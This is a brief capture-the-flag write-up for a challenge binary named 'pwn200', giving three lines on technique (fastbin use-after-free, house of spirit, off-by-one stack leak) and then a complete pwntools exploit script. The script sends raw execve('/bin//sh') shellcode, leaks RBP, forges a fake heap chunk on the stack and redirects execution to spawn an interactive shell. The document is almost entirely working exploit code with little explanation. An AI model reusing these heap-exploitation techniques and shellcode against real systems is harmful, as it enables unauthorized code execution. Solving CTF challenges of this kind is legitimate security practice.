fastbin UAF + house of spirit

off by one leak the address of RBP

input money overwrite pointer that point to stack address

and make a fake thunk struct here

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
from pwn import *
raw_file=ELF('pwn200')
libc=ELF('libc.so.6')
p=process('pwn200')
p.recvuntil('who are u?\n')
def makeshellcode():
shellcode="\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73"
shellcode+="\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
shellcode=shellcode.ljust(47,'a')
shellcode+='m'
return shellcode
def leakrbp():
p.recvuntil('m')
result=p.recvuntil(', w')
rbp_addr=u64(result[:-3].ljust(0x8,'\x00'))
return rbp_addr
shellcode=makeshellcode()
p.send(shellcode)
rbp_addr=leakrbp()
print "rbp_addr is ",hex(rbp_addr)
target_addr=rbp_addr-0x90
shellcode_addr=rbp_addr-0x50
p.recvuntil('id ~~?')
p.send('32'+'\n')
p.recvuntil('money~')
payload=p64(0)*4+p64(0)+p64(0x41)
payload=payload.ljust(0x38,'\x00')+p64(target_addr)
p.send(payload)
p.recvuntil('choice : ')
p.send('2'+'\n')
p.recvuntil('choice : ')
p.send('1'+'\n')
p.recvuntil('long?')
p.send('48\n')
p.recvuntil('48\n')
data='a'*0x18+p64(shellcode_addr)
data=data.ljust(48,'\x00')
p.send(data)
p.recvuntil('choice : ')
p.send('3\n')
p.interactive()